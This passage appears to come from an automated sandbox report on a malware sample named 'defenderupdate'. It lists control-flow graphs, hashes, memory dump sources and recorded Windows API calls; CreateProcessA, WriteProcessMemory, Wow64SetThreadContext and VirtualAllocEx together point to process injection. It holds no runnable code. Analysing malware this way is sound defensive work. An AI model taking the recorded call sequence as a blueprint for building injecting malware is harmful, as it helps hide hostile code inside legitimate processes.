1742->1712 1751 6a83a55-6a83a5b 1742->1751 1743->1742 1750 6a83a37-6a83a4e 1743->1750 1750->1742 1751->1712 1755 6a83a5d-6a83a8b 1751->1755 1757 6a8396d-6a8396f 1752->1757 1753->1757 1755->1712 1757->1703 1759 6a83804-6a83812 call 6a822f0 1757->1759 1776 6a8382a-6a83844 1759->1776 1777 6a83814-6a8381a 1759->1777 1812 6a83663-6a83667 1766->1812 1813 6a83657-6a83659 1766->1813 1772->1704 1776->1741 1786 6a8384a-6a8384e 1776->1786 1780 6a8381c 1777->1780 1781 6a8381e-6a83820 1777->1781 1780->1776 1781->1776 1790 6a8386f 1786->1790 1791 6a83850-6a83859 1786->1791 1792 6a83872-6a8388c 1790->1792 1794 6a8385b-6a8385e 1791->1794 1795 6a83860-6a83863 1791->1795 1792->1741 1815 6a83892-6a83913 call 6a80b20 * 4 1792->1815 1799 6a8386d 1794->1799 1795->1799 1809 6a83b58 1797->1809 1810 6a83b4c-6a83b56 1797->1810 1799->1792 1801->1802 1811 6a837d4-6a837e1 1802->1811 1816 6a83b5d-6a83b5f 1809->1816 1810->1816 1811->1724 1812->1717 1814 6a83669-6a83681 1812->1814 1813->1812 1814->1717 1822 6a83683-6a8368f 1814->1822 1842 6a8392a-6a83950 call 6a80b20 1815->1842 1843 6a83915-6a83927 call 6a80b20 1815->1843 1817 6a83b61-6a83b64 1816->1817 1818 6a83b66-6a83b6b 1816->1818 1821 6a83b71-6a83b9e 1817->1821 1818->1821 1824 6a8369e-6a836a4 1822->1824 1825 6a83691-6a83694 1822->1825 1827 6a836ac-6a836b5 1824->1827 1828 6a836a6-6a836a9 1824->1828 1825->1824 1831 6a836c4-6a836ca 1827->1831 1832 6a836b7-6a836ba 1827->1832 1828->1827 1831->1717 1832->1831 1842->1703 1842->1741 1843->1842
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q
                                                                                                • API String ID: 0-355816377
                                                                                                • Opcode ID: 5ef894682c92429771b6e4fc70ba29c3686a676ee0072462fb53e5fe65c42782
                                                                                                • Instruction ID: 4ee584e641d88d7408098e9ab80edd9cb0a1b6e508946b37b47c620f93425304
                                                                                                • Opcode Fuzzy Hash: 5ef894682c92429771b6e4fc70ba29c3686a676ee0072462fb53e5fe65c42782
                                                                                                • Instruction Fuzzy Hash: 17124A70E002198FDF55EFA9D894AADBBB2FF48B00F148115E811AB295DB399D46CB50

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1848 6a86e98-6a86eaa 1849 6a86eac-6a86ecd 1848->1849 1850 6a86ed4-6a86ed8 1848->1850 1849->1850 1851 6a86eda-6a86edc 1850->1851 1852 6a86ee4-6a86ef3 1850->1852 1851->1852 1853 6a86eff-6a86f2b 1852->1853 1854 6a86ef5 1852->1854 1858 6a87158-6a8719f 1853->1858 1859 6a86f31-6a86f37 1853->1859 1854->1853 1890 6a871a1 1858->1890 1891 6a871b5-6a871c1 1858->1891 1860 6a87009-6a8700d 1859->1860 1861 6a86f3d-6a86f43 1859->1861 1863 6a8700f-6a87018 1860->1863 1864 6a87030-6a87039 1860->1864 1861->1858 1866 6a86f49-6a86f56 1861->1866 1863->1858 1867 6a8701e-6a8702e 1863->1867 1868 6a8703b-6a8705b 1864->1868 1869 6a8705e-6a87061 1864->1869 1870 6a86fe8-6a86ff1 1866->1870 1871 6a86f5c-6a86f65 1866->1871 1872 6a87064-6a8706a 1867->1872 1868->1869 1869->1872 1870->1858 1875 6a86ff7-6a87003 1870->1875 1871->1858 1874 6a86f6b-6a86f83 1871->1874 1872->1858 1877 6a87070-6a87083 1872->1877 1878 6a86f8f-6a86fa1 1874->1878 1879 6a86f85 1874->1879 1875->1860 1875->1861 1877->1858 1881 6a87089-6a87099 1877->1881 1878->1870 1885 6a86fa3-6a86fa9 1878->1885 1879->1878 1881->1858 1884 6a8709f-6a870ac 1881->1884 1884->1858 1887 6a870b2-6a870c7 1884->1887 1888 6a86fab 1885->1888 1889 6a86fb5-6a86fbb 1885->1889 1887->1858 1897 6a870cd-6a870f0 1887->1897 1888->1889 1889->1858 1894 6a86fc1-6a86fe5 1889->1894 1895 6a871a4-6a871a6 1890->1895 1892 6a871cd-6a871e9 1891->1892 1893 6a871c3 1891->1893 1893->1892 1898 6a871a8-6a871b3 1895->1898 1899 6a871ea-6a87217 call 6a822f0 1895->1899 1897->1858 1904 6a870f2-6a870fd 1897->1904 1898->1891 1898->1895 1910 6a87219-6a8721f 1899->1910 1911 6a8722f-6a87231 1899->1911 1907 6a8714e-6a87155 1904->1907 1908 6a870ff-6a87109 1904->1908 1908->1907 1916 6a8710b-6a87121 1908->1916 1913 6a87221 1910->1913 1914 6a87223-6a87225 1910->1914 1934 6a87233 call 6a880c0 1911->1934 1935 6a87233 call 6a872b0 1911->1935 1936 6a87233 call 6a88071 1911->1936 1937 6a87233 call 6a872a1 1911->1937 1913->1911 1914->1911 1915 6a87239-6a8723d 1917 6a87288-6a8728d 1915->1917 1918 6a8723f-6a87256 1915->1918 1922 6a8712d-6a87146 1916->1922 1923 6a87123 1916->1923 1920 6a87295-6a87298 1917->1920 1918->1917 1926 6a87258-6a87262 1918->1926 1922->1907 1923->1922 1929 6a87264-6a87273 1926->1929 1930 6a87275-6a87285 1926->1930 1929->1930 1934->1915 1935->1915 1936->1915 1937->1915
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$d
                                                                                                • API String ID: 0-3334038649
                                                                                                • Opcode ID: 88245e205bab3c1762b2bd1dcc2b7481c7777413ed7ebbb9fc8f473c577127bd
                                                                                                • Instruction ID: e36e3dc8e1294f5ac1f23d7e61759226fa20c208b0df3ed36be6a431873c0b9f
                                                                                                • Opcode Fuzzy Hash: 88245e205bab3c1762b2bd1dcc2b7481c7777413ed7ebbb9fc8f473c577127bd
                                                                                                • Instruction Fuzzy Hash: D3D149306006068FCB54EF29C59496AB7F2FF88310B25C969E45A9B765DB31FC46CB90

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1938 6a87c21-6a87c43 1939 6a87c4c-6a87c57 1938->1939 1940 6a87c59-6a87c5b 1939->1940 1941 6a87ca5-6a87cbf 1939->1941 1942 6a87c5d-6a87c67 1940->1942 1943 6a87c77-6a87c7b 1940->1943 1954 6a87cc9-6a87cd8 1941->1954 1955 6a87cc1-6a87cc7 1941->1955 1945 6a87c6d-6a87c71 1942->1945 1946 6a87f87-6a87fab 1942->1946 1947 6a87c7d-6a87c83 1943->1947 1948 6a87c9f-6a87ca3 1943->1948 1945->1943 1949 6a87df5-6a87df8 1945->1949 1956 6a87fad-6a87fb9 1946->1956 1947->1946 1950 6a87c89-6a87c96 1947->1950 1948->1940 1948->1941 1949->1946 1951 6a87dfe-6a87e76 1949->1951 1950->1948 1962 6a87c98 1950->1962 1968 6a87e7d-6a87ec5 1951->1968 1959 6a87cde-6a87d17 1954->1959 1954->1968 1955->1959 1960 6a88019-6a8801d 1956->1960 1961 6a87fbb-6a87fc1 1956->1961 1988 6a87d19-6a87d20 1959->1988 1989 6a87d27-6a87d3c 1959->1989 1960->1956 1966 6a8801f-6a88026 1960->1966 1964 6a87fc3-6a87fca 1961->1964 1965 6a88027-6a8804d 1961->1965 1962->1948 1964->1965 1970 6a87fcc-6a87fd2 1964->1970 1999 6a87ecc-6a87f02 1968->1999 1972 6a88013-6a88017 1970->1972 1973 6a87fd4-6a87fdf 1970->1973 1972->1960 1972->1961 1973->1965 1977 6a87fe1-6a87feb 1973->1977 1977->1965 1979 6a87fed-6a8800c 1977->1979 1979->1972 1988->1989 1990 6a87d22-6a87d24 1988->1990 1989->1999 2000 6a87d42-6a87d63 1989->2000 1990->1989 2018 6a87f09-6a87f2d 1999->2018 2006 6a87d94-6a87da4 2000->2006 2007 6a87d65-6a87d72 2000->2007 2013 6a87dc8 2006->2013 2014 6a87da6-6a87dc6 2006->2014 2011 6a87d82 2007->2011 2012 6a87d74-6a87d80 2007->2012 2016 6a87d87-6a87d8a 2011->2016 2012->2016 2017 6a87dca-6a87ddf 2013->2017 2014->2017 2016->2018 2019 6a87d90 2016->2019 2021 6a87deb-6a87df2 2017->2021 2022 6a87de1-6a87de5 2017->2022 2023 6a87f34-6a87f80 2018->2023 2019->2006 2022->2021 2022->2023 2023->1946
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Hbq$Hbq
                                                                                                • API String ID: 0-4258043069
                                                                                                • Opcode ID: 85138e2132983c034a430ed987603af5cee2908206155604481901ac00a72a00
                                                                                                • Instruction ID: 42cb90af1d60ff17cab5b751135f52c67d880efcdd94cb7cde6ea6bb90419e26
                                                                                                • Opcode Fuzzy Hash: 85138e2132983c034a430ed987603af5cee2908206155604481901ac00a72a00
                                                                                                • Instruction Fuzzy Hash: 2EC1AE306005159FCB55EF29C480AAEBBF6FF88314F258569E8099F3A5CB34ED46CB91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2106 6a82b10-6a82b22 2107 6a82b28-6a82b2a 2106->2107 2108 6a82c16-6a82c3b 2106->2108 2109 6a82b30-6a82b3c 2107->2109 2110 6a82c42-6a82c66 2107->2110 2108->2110 2114 6a82b3e-6a82b4a 2109->2114 2115 6a82b50-6a82b60 2109->2115 2122 6a82c6d-6a82c91 2110->2122 2114->2115 2114->2122 2115->2122 2123 6a82b66-6a82b74 2115->2123 2126 6a82c98-6a82d1b 2122->2126 2123->2126 2127 6a82b7a-6a82b7f 2123->2127 2150 6a82d22-6a82d30 call 6a822f0 2126->2150 2151 6a82d1d call 6a80040 2126->2151 2160 6a82b81 call 6a82d10 2127->2160 2161 6a82b81 call 6a82b10 2127->2161 2162 6a82b81 call 6a82b01 2127->2162 2129 6a82b87-6a82bd0 2144 6a82bd2-6a82beb 2129->2144 2145 6a82bf3-6a82c13 call 6a810f0 2129->2145 2144->2145 2156 6a82d48-6a82d4a 2150->2156 2157 6a82d32-6a82d38 2150->2157 2151->2150 2158 6a82d3a 2157->2158 2159 6a82d3c-6a82d3e 2157->2159 2158->2156 2159->2156 2160->2129 2161->2129 2162->2129
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$Hbq
                                                                                                • API String ID: 0-4081012451
                                                                                                • Opcode ID: 747e6187e785d14b3524773566bec48e9175418d50a89d2a6c4c787a5cd22cd5
                                                                                                • Instruction ID: 43e71d263c571bff16950dca7bf25cc6ac905c6594a65c564e77d50e290157ed
                                                                                                • Opcode Fuzzy Hash: 747e6187e785d14b3524773566bec48e9175418d50a89d2a6c4c787a5cd22cd5
                                                                                                • Instruction Fuzzy Hash: 82518B707002108FD7AABF39C86462E7BA6BF99300B24846DD5068B3A5CF35ED06CB95

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2163 6a850d3-6a85100 2165 6a851ec-6a85211 2163->2165 2166 6a85106-6a8510a 2163->2166 2175 6a85218-6a8523c 2165->2175 2167 6a8510c-6a85118 2166->2167 2168 6a8511e-6a85122 2166->2168 2167->2168 2167->2175 2169 6a85128-6a8513f 2168->2169 2170 6a85243-6a85268 2168->2170 2181 6a85141-6a8514d 2169->2181 2182 6a85153-6a85157 2169->2182 2189 6a8526f-6a852c2 2170->2189 2175->2170 2181->2182 2181->2189 2184 6a85159-6a85172 2182->2184 2185 6a85183-6a8519c call 6a82228 2182->2185 2184->2185 2198 6a85174-6a85177 2184->2198 2196 6a8519e-6a851c2 2185->2196 2197 6a851c5-6a851e9 2185->2197 2206 6a852fa-6a8531f 2189->2206 2207 6a852c4-6a852e4 2189->2207 2202 6a85180 2198->2202 2202->2185 2214 6a85326-6a8537a 2206->2214 2207->2214 2215 6a852e6-6a852f7 2207->2215 2221 6a85380-6a8538c 2214->2221 2222 6a85421-6a8546f 2214->2222 2225 6a8538e-6a85395 2221->2225 2226 6a85396-6a853aa call 6a80a28 2221->2226 2235 6a8549f-6a854a5 2222->2235 2236 6a85471-6a85495 2222->2236 2230 6a85419-6a85420 2226->2230 2231 6a853ac-6a853d1 2226->2231 2243 6a853d3-6a853ed 2231->2243 2244 6a85414-6a85417 2231->2244 2238 6a854b7-6a854c6 2235->2238 2239 6a854a7-6a854b4 2235->2239 2236->2235 2237 6a85497 2236->2237 2237->2235 2243->2244 2246 6a853ef-6a853f8 2243->2246 2244->2230 2244->2231 2247 6a853fa-6a853fd 2246->2247 2248 6a85407-6a85413 2246->2248 2247->2248
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$(bq
                                                                                                • API String ID: 0-4224401849
                                                                                                • Opcode ID: 55b51389bf8736a358282281640c8694c943894a6de121ed59d4f69fe248310d
                                                                                                • Instruction ID: 1827ca8a728f90b92b78d42833f1e50581eb2ca38a6d9fab3a93735679e11fa9
                                                                                                • Opcode Fuzzy Hash: 55b51389bf8736a358282281640c8694c943894a6de121ed59d4f69fe248310d
                                                                                                • Instruction Fuzzy Hash: 4051AF31B002458FDB55EF28D8506AE7BA2FF84345F2481A9E8058F3A6CF35ED56CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: <$Q
                                                                                                • API String ID: 0-1068778786
                                                                                                • Opcode ID: 7dcfdc32b948eb0c6e478db4b10d184d27a90311196dd1f39a4aeca3f9b54c66
                                                                                                • Instruction ID: f0e2252d8a266b13f28cd6a990dcc3c97f802fd784e7210ae658f1169acb093b
                                                                                                • Opcode Fuzzy Hash: 7dcfdc32b948eb0c6e478db4b10d184d27a90311196dd1f39a4aeca3f9b54c66
                                                                                                • Instruction Fuzzy Hash: E901B370D21328DFDF94EFA4D888B9CB6F1BB49318F2040A9D408A7240C7341A85CF20
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,bq
                                                                                                • API String ID: 0-2474004448
                                                                                                • Opcode ID: 2d65921a812024e6db021d3105f288cbafbccb448571cd94f4b6d092208baaf8
                                                                                                • Instruction ID: c9a2503012de8a2a941907d918e65228cf65a7660c82ee8fc839c3075330a840
                                                                                                • Opcode Fuzzy Hash: 2d65921a812024e6db021d3105f288cbafbccb448571cd94f4b6d092208baaf8
                                                                                                • Instruction Fuzzy Hash: 04521B75A002288FDB65EF69C954BDDBBF2BF88300F1540DAD609AB361DA309D85CF61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (_^q
                                                                                                • API String ID: 0-538443824
                                                                                                • Opcode ID: ee863b939354957e85eefcac42139f495d594d03600cb580012a63f025c8f0fe
                                                                                                • Instruction ID: 1273ffebb3d8951c422da5312b9a41eb7230014d42915f25c5c464e836ce9c33
                                                                                                • Opcode Fuzzy Hash: ee863b939354957e85eefcac42139f495d594d03600cb580012a63f025c8f0fe
                                                                                                • Instruction Fuzzy Hash: F8228C75A002159FEB44EFA9D494A6DBBF2FF88300F148069E905AF3A5DB71EC45CB90
                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B7C2F2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 50655b5056b5cce4c4292ec0eb7e923314f2fcc137194ea168d71bdb41fa72fb
                                                                                                • Instruction ID: cfc2f521f08402a709be985f067913257b341c463f32c8368f2991fea0585829
                                                                                                • Opcode Fuzzy Hash: 50655b5056b5cce4c4292ec0eb7e923314f2fcc137194ea168d71bdb41fa72fb
                                                                                                • Instruction Fuzzy Hash: EF8135B1D002598FDB60CFA9C8817ADBFF1FF48314F249569E869A7280D7759981CF81
                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B7C2F2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: cef3275d94fcf1235d03cd576f183804af195ba3fd60f6432710e3eacfc3571b
                                                                                                • Instruction ID: 78ad2d74ecf043ae26cad6216b30b870d1f2ec7750fd64a847fbc154239799a9
                                                                                                • Opcode Fuzzy Hash: cef3275d94fcf1235d03cd576f183804af195ba3fd60f6432710e3eacfc3571b
                                                                                                • Instruction Fuzzy Hash: 8E8124B1D002598FDBA0CFA9C8817ADBFF1EF48314F249569E869A7280D7759881CF81
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 018AA6DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2168095387.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_18a0000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: 4e9253debff1e02d073b4fc6b12f67b76f41b67b642e3dcd4a1e762044a5e31b
                                                                                                • Instruction ID: fce69dee4850676401cd182a2e1bbb171067b0998039917d4c395c290a28f333
                                                                                                • Opcode Fuzzy Hash: 4e9253debff1e02d073b4fc6b12f67b76f41b67b642e3dcd4a1e762044a5e31b
                                                                                                • Instruction Fuzzy Hash: 6C812370A00B058FEB28DF69D44475ABBF1BB88304F008A2DE58AD7A50D775EA45CB95
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B7D218
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: a68b8d5d57cef3852fcb8c09e04c015a00fa3b104cf23afa79bc09fe191ae296
                                                                                                • Instruction ID: 9fb4e0ccba327e2778a6ab94d6ab51515b087c4cc5406d05a3b52727b07ff22e
                                                                                                • Opcode Fuzzy Hash: a68b8d5d57cef3852fcb8c09e04c015a00fa3b104cf23afa79bc09fe191ae296
                                                                                                • Instruction Fuzzy Hash: C22157B19003199FCB10CFA9C885BDEBBF5FF48320F10842AE959A7250C778A955CFA4
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B7D218
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 2ef48ea62fbfafd811bf233dd16dd5a0f6362547a858bbf33fa367b9a209118b
                                                                                                • Instruction ID: d33b516af40c904d10fd836477f6122f870fb5b9846079f038af37e1467f1588
                                                                                                • Opcode Fuzzy Hash: 2ef48ea62fbfafd811bf233dd16dd5a0f6362547a858bbf33fa367b9a209118b
                                                                                                • Instruction Fuzzy Hash: 142136B29003599FCB10CFA9C985BDEBBF5FF48310F10842AE959A7250C778A955CBA4
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B7C966
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: 3b4099454921bdc29dfdbac20188d24c261136f57f0b482638d58ae3ee741c5b
                                                                                                • Instruction ID: a3b691b8f24e9f64cb9133fa4c175baac90c1b78ff28a92802a07103c10b3723
                                                                                                • Opcode Fuzzy Hash: 3b4099454921bdc29dfdbac20188d24c261136f57f0b482638d58ae3ee741c5b
                                                                                                • Instruction Fuzzy Hash: EC2136B19002098FDB50DFAAC4447EEBBF4EB48324F108429D459A7241C778A545CBA5
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 018ACDE7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2168095387.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_18a0000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: b6c2683f5c042e0e80a4eb04549958c765e5961c842c2c2f5a89df411c720d0e
                                                                                                • Instruction ID: d30f422abc386280ce9a3dd0d47c10f68a6d14daa73d6c4c51f467914af6cba2
                                                                                                • Opcode Fuzzy Hash: b6c2683f5c042e0e80a4eb04549958c765e5961c842c2c2f5a89df411c720d0e
                                                                                                • Instruction Fuzzy Hash: 8A21E5B5900219DFDB10CFAAD984ADEBFF4FB48324F14841AE954A7310D375A954CFA4
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B7C966
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: e6a2f6c5d03823a1aaa0a3020d03bcf429d8e3e06c944335cdcddf353720d35e
                                                                                                • Instruction ID: 4ddc3e9bb8a259be3508e6f77fefb6ab852ca15c050369e6b35dda8a897ee118
                                                                                                • Opcode Fuzzy Hash: e6a2f6c5d03823a1aaa0a3020d03bcf429d8e3e06c944335cdcddf353720d35e
                                                                                                • Instruction Fuzzy Hash: 802137B1D002098FDB50DFAAC4857EEBBF4EB48324F50842AD459A7241CB78A945CFA4
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 018ACDE7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2168095387.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_18a0000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 547f4c6fd39c1286dba40e1176005fcef83fb01aea50b00b6e350b9636c64db3
                                                                                                • Instruction ID: 3b1e6a6097ec3d39871fcb2567343360aa425f616f5d4526ff9af9980bacc669
                                                                                                • Opcode Fuzzy Hash: 547f4c6fd39c1286dba40e1176005fcef83fb01aea50b00b6e350b9636c64db3
                                                                                                • Instruction Fuzzy Hash: 7E21E4B59002089FDB10CF9AD984ADEBFF4FB48310F14801AE914A7310D374A944CFA4
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2221930880.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 4ec2dcc091d4c7dfd7cf965d9db35e24bf9fb44b53bfec6f35c139d0f8b5b9db
                                                                                                • Instruction ID: 30654163449a91400048900dd57df565be5c023a8057cbf56e2bb97bdb9e809c
                                                                                                • Opcode Fuzzy Hash: 4ec2dcc091d4c7dfd7cf965d9db35e24bf9fb44b53bfec6f35c139d0f8b5b9db
                                                                                                • Instruction Fuzzy Hash: 491137B1D002598EDB10DFAAC844BEFBFF5AF88324F14842AD455A7250CB399945CFA4
                                                                                                APIs
                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06C4DCB4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222847887.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6c40000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: e9984b0de1e09dd9bcdfc908037039b3424c20e53ce64323ce8310d2a1387668
                                                                                                • Instruction ID: 44142c89aaa1d3b578f11b198c37f29bfabb029006c1df2a7cdb6f399e5da4bf
                                                                                                • Opcode Fuzzy Hash: e9984b0de1e09dd9bcdfc908037039b3424c20e53ce64323ce8310d2a1387668
                                                                                                • Instruction Fuzzy Hash: 381106B1D002499FCB10EFAAC844ADEFBF4FF48324F10842AD559A7250CB75A945CFA5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2221930880.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 3b5d32a0c87f7cccd57aedf6e2be4cb721c9f1f0c6b9c6cd8667d10c2badd18a
                                                                                                • Instruction ID: ae13f810960fdc6437fce538dc438f564391995c275394331c1f35adc0a9ee69
                                                                                                • Opcode Fuzzy Hash: 3b5d32a0c87f7cccd57aedf6e2be4cb721c9f1f0c6b9c6cd8667d10c2badd18a
                                                                                                • Instruction Fuzzy Hash: 83111CB1D002598FDB10DFAAC845BEFFFF4EB88324F14841AD455A7250CB75A945CBA4
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B7CF56
                                                                                                Memory Dump Source
